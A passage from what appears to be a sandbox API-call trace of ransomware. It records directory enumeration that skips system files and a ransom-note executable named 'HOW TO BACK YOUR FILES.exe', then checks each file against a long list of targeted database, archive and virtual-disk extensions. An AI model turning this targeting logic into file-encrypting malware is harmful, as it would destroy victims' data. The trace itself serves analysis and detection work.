dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.388] GetLastError () returned 0x0 [0092.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.388] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.388] CloseHandle (hObject=0x120) returned 1 [0092.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.388] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.388] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.388] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.388] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.388] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.388] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.388] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.388] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.388] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.388] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0092.388] lstrcmpiW (lpString1="Accessibility", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.388] lstrcmpiW (lpString1="Accessibility", lpString2="aoldtz.exe") returned -1 [0092.388] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="windows") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="bootmgr") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="temp") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="pagefile.sys") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="boot") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="ids.txt") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="ntuser.dat") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="perflogs") returned -1 [0092.389] lstrcmpiW (lpString1="Accessibility", lpString2="MSBuild") returned -1 [0092.389] lstrlenW (lpString="Accessibility") returned 13 [0092.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\*") returned 63 [0092.389] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Accessibility" | out: lpString1="Accessibility") returned="Accessibility" [0092.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0092.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x334fc8 [0092.389] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0092.389] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="aoldtz.exe") returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".") returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="..") returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="windows") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootmgr") returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="temp") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="pagefile.sys") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot") returned 1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ids.txt") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="perflogs") returned -1 [0092.389] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="MSBuild") returned -1 [0092.389] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0092.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility") returned 75 [0092.389] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Command Prompt.lnk" | out: lpString1="Command Prompt.lnk") returned="Command Prompt.lnk" [0092.389] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0092.389] lstrlenW (lpString="Ares865") returned 7 [0092.390] lstrcmpiW (lpString1="mpt.lnk", lpString2="Ares865") returned 1 [0092.390] lstrlenW (lpString=".dll") returned 4 [0092.390] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".dll") returned 1 [0092.390] lstrlenW (lpString=".lnk") returned 4 [0092.390] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".lnk") returned 1 [0092.390] lstrlenW (lpString=".ini") returned 4 [0092.390] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".ini") returned 1 [0092.390] lstrlenW (lpString=".sys") returned 4 [0092.390] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2=".sys") returned 1 [0092.390] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0092.390] lstrlenW (lpString="bak") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.390] lstrlenW (lpString="ba_") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.390] lstrlenW (lpString="dbb") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.390] lstrlenW (lpString="vmdk") returned 4 [0092.390] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.390] lstrlenW (lpString="rar") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.390] lstrlenW (lpString="zip") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.390] lstrlenW (lpString="tgz") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.390] lstrlenW (lpString="vbox") returned 4 [0092.390] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.390] lstrlenW (lpString="vdi") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.390] lstrlenW (lpString="vhd") returned 3 [0092.390] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.390] lstrlenW (lpString="vhdx") returned 4 [0092.390] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.390] lstrlenW (lpString="avhd") returned 4 [0092.390] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.390] lstrlenW (lpString="db") returned 2 [0092.390] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.390] lstrlenW (lpString="db2") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.391] lstrlenW (lpString="db3") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.391] lstrlenW (lpString="dbf") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.391] lstrlenW (lpString="mdf") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.391] lstrlenW (lpString="mdb") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.391] lstrlenW (lpString="sql") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.391] lstrlenW (lpString="sqlite") returned 6 [0092.391] lstrcmpiW (lpString1="pt.lnk", lpString2="sqlite") returned -1 [0092.391] lstrlenW (lpString="sqlite3") returned 7 [0092.391] lstrcmpiW (lpString1="mpt.lnk", lpString2="sqlite3") returned -1 [0092.391] lstrlenW (lpString="sqlitedb") returned 8 [0092.391] lstrcmpiW (lpString1="ompt.lnk", lpString2="sqlitedb") returned -1 [0092.391] lstrlenW (lpString="xml") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.391] lstrlenW (lpString="$er") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.391] lstrlenW (lpString="4dd") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.391] lstrlenW (lpString="4dl") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.391] lstrlenW (lpString="^^^") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.391] lstrlenW (lpString="abs") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.391] lstrlenW (lpString="abx") returned 3 [0092.391] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.391] lstrlenW (lpString="accdb") returned 5 [0092.391] lstrcmpiW (lpString1="t.lnk", lpString2="accdb") returned 1 [0092.391] lstrlenW (lpString="accdc") returned 5 [0092.391] lstrcmpiW (lpString1="t.lnk", lpString2="accdc") returned 1 [0092.391] lstrlenW (lpString="accde") returned 5 [0092.392] lstrcmpiW (lpString1="t.lnk", lpString2="accde") returned 1 [0092.392] lstrlenW (lpString="accdr") returned 5 [0092.392] lstrcmpiW (lpString1="t.lnk", lpString2="accdr") returned 1 [0092.392] lstrlenW (lpString="accdt") returned 5 [0092.392] lstrcmpiW (lpString1="t.lnk", lpString2="accdt") returned 1 [0092.392] lstrlenW (lpString="accdw") returned 5 [0092.392] lstrcmpiW (lpString1="t.lnk", lpString2="accdw") returned 1 [0092.392] lstrlenW (lpString="accft") returned 5 [0092.392] lstrcmpiW (lpString1="t.lnk", lpString2="accft") returned 1 [0092.392] lstrlenW (lpString="adb") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.392] lstrlenW (lpString="adb") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.392] lstrlenW (lpString="ade") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.392] lstrlenW (lpString="adf") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.392] lstrlenW (lpString="adn") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.392] lstrlenW (lpString="adp") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.392] lstrlenW (lpString="alf") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.392] lstrlenW (lpString="ask") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.392] lstrlenW (lpString="btr") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.392] lstrlenW (lpString="cat") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.392] lstrlenW (lpString="cdb") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.392] lstrlenW (lpString="ckp") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.392] lstrlenW (lpString="cma") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.392] lstrlenW (lpString="cpd") returned 3 [0092.392] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.393] lstrlenW (lpString="dacpac") returned 6 [0092.393] lstrcmpiW (lpString1="pt.lnk", lpString2="dacpac") returned 1 [0092.393] lstrlenW (lpString="dad") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.393] lstrlenW (lpString="dadiagrams") returned 10 [0092.393] lstrcmpiW (lpString1="Prompt.lnk", lpString2="dadiagrams") returned 1 [0092.393] lstrlenW (lpString="daschema") returned 8 [0092.393] lstrcmpiW (lpString1="ompt.lnk", lpString2="daschema") returned 1 [0092.393] lstrlenW (lpString="db-journal") returned 10 [0092.393] lstrcmpiW (lpString1="Prompt.lnk", lpString2="db-journal") returned 1 [0092.393] lstrlenW (lpString="db-shm") returned 6 [0092.393] lstrcmpiW (lpString1="pt.lnk", lpString2="db-shm") returned 1 [0092.393] lstrlenW (lpString="db-wal") returned 6 [0092.393] lstrcmpiW (lpString1="pt.lnk", lpString2="db-wal") returned 1 [0092.393] lstrlenW (lpString="dbc") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.393] lstrlenW (lpString="dbs") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.393] lstrlenW (lpString="dbt") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.393] lstrlenW (lpString="dbv") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.393] lstrlenW (lpString="dbx") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.393] lstrlenW (lpString="dcb") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.393] lstrlenW (lpString="dct") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.393] lstrlenW (lpString="dcx") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.393] lstrlenW (lpString="ddl") returned 3 [0092.393] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.394] lstrlenW (lpString="dlis") returned 4 [0092.394] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.394] lstrlenW (lpString="dp1") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.394] lstrlenW (lpString="dqy") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.394] lstrlenW (lpString="dsk") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.394] lstrlenW (lpString="dsn") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.394] lstrlenW (lpString="dtsx") returned 4 [0092.394] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.394] lstrlenW (lpString="dxl") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.394] lstrlenW (lpString="eco") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.394] lstrlenW (lpString="ecx") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.394] lstrlenW (lpString="edb") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.394] lstrlenW (lpString="epim") returned 4 [0092.394] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.394] lstrlenW (lpString="fcd") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.394] lstrlenW (lpString="fdb") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.394] lstrlenW (lpString="fic") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.394] lstrlenW (lpString="flexolibrary") returned 12 [0092.394] lstrcmpiW (lpString1="d Prompt.lnk", lpString2="flexolibrary") returned -1 [0092.394] lstrlenW (lpString="fm5") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.394] lstrlenW (lpString="fmp") returned 3 [0092.394] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.394] lstrlenW (lpString="fmp12") returned 5 [0092.394] lstrcmpiW (lpString1="t.lnk", lpString2="fmp12") returned 1 [0092.394] lstrlenW (lpString="fmpsl") returned 5 [0092.395] lstrcmpiW (lpString1="t.lnk", lpString2="fmpsl") returned 1 [0092.395] lstrlenW (lpString="fol") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.395] lstrlenW (lpString="fp3") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.395] lstrlenW (lpString="fp4") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.395] lstrlenW (lpString="fp5") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.395] lstrlenW (lpString="fp7") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.395] lstrlenW (lpString="fpt") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.395] lstrlenW (lpString="frm") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.395] lstrlenW (lpString="gdb") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.395] lstrlenW (lpString="gdb") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.395] lstrlenW (lpString="grdb") returned 4 [0092.395] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.395] lstrlenW (lpString="gwi") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.395] lstrlenW (lpString="hdb") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.395] lstrlenW (lpString="his") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.395] lstrlenW (lpString="ib") returned 2 [0092.395] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.395] lstrlenW (lpString="idb") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.395] lstrlenW (lpString="ihx") returned 3 [0092.395] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.395] lstrlenW (lpString="itdb") returned 4 [0092.395] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.395] lstrlenW (lpString="itw") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.396] lstrlenW (lpString="jet") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.396] lstrlenW (lpString="jtx") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.396] lstrlenW (lpString="kdb") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.396] lstrlenW (lpString="kexi") returned 4 [0092.396] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.396] lstrlenW (lpString="kexic") returned 5 [0092.396] lstrcmpiW (lpString1="t.lnk", lpString2="kexic") returned 1 [0092.396] lstrlenW (lpString="kexis") returned 5 [0092.396] lstrcmpiW (lpString1="t.lnk", lpString2="kexis") returned 1 [0092.396] lstrlenW (lpString="lgc") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.396] lstrlenW (lpString="lwx") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.396] lstrlenW (lpString="maf") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.396] lstrlenW (lpString="maq") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.396] lstrlenW (lpString="mar") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.396] lstrlenW (lpString="marshal") returned 7 [0092.396] lstrcmpiW (lpString1="mpt.lnk", lpString2="marshal") returned 1 [0092.396] lstrlenW (lpString="mas") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.396] lstrlenW (lpString="mav") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.396] lstrlenW (lpString="maw") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.396] lstrlenW (lpString="mdbhtml") returned 7 [0092.396] lstrcmpiW (lpString1="mpt.lnk", lpString2="mdbhtml") returned 1 [0092.396] lstrlenW (lpString="mdn") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.396] lstrlenW (lpString="mdt") returned 3 [0092.396] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.397] lstrlenW (lpString="mfd") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.397] lstrlenW (lpString="mpd") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.397] lstrlenW (lpString="mrg") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.397] lstrlenW (lpString="mud") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.397] lstrlenW (lpString="mwb") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.397] lstrlenW (lpString="myd") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.397] lstrlenW (lpString="ndf") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.397] lstrlenW (lpString="nnt") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.397] lstrlenW (lpString="nrmlib") returned 6 [0092.397] lstrcmpiW (lpString1="pt.lnk", lpString2="nrmlib") returned 1 [0092.397] lstrlenW (lpString="ns2") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.397] lstrlenW (lpString="ns3") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.397] lstrlenW (lpString="ns4") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.397] lstrlenW (lpString="nsf") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.397] lstrlenW (lpString="nv") returned 2 [0092.397] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.397] lstrlenW (lpString="nv2") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.397] lstrlenW (lpString="nwdb") returned 4 [0092.397] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.397] lstrlenW (lpString="nyf") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.397] lstrlenW (lpString="odb") returned 3 [0092.397] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.397] lstrlenW (lpString="odb") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.398] lstrlenW (lpString="oqy") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.398] lstrlenW (lpString="ora") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.398] lstrlenW (lpString="orx") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.398] lstrlenW (lpString="owc") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.398] lstrlenW (lpString="p96") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.398] lstrlenW (lpString="p97") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.398] lstrlenW (lpString="pan") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.398] lstrlenW (lpString="pdb") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.398] lstrlenW (lpString="pdm") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.398] lstrlenW (lpString="pnz") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.398] lstrlenW (lpString="qry") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.398] lstrlenW (lpString="qvd") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.398] lstrlenW (lpString="rbf") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.398] lstrlenW (lpString="rctd") returned 4 [0092.398] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.398] lstrlenW (lpString="rod") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.398] lstrlenW (lpString="rodx") returned 4 [0092.398] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.398] lstrlenW (lpString="rpd") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.398] lstrlenW (lpString="rsd") returned 3 [0092.398] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.399] lstrlenW (lpString="sas7bdat") returned 8 [0092.399] lstrcmpiW (lpString1="ompt.lnk", lpString2="sas7bdat") returned -1 [0092.399] lstrlenW (lpString="sbf") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.399] lstrlenW (lpString="scx") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.399] lstrlenW (lpString="sdb") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.399] lstrlenW (lpString="sdc") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.399] lstrlenW (lpString="sdf") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.399] lstrlenW (lpString="sis") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.399] lstrlenW (lpString="spq") returned 3 [0092.399] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.399] lstrlenW (lpString="te") returned 2 [0092.399] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.399] lstrlenW (lpString="teacher") returned 7 [0092.399] lstrcmpiW (lpString1="mpt.lnk", lpString2="teacher") returned -1 [0092.399] lstrlenW (lpString="tmd") returned 3 [0092.399] 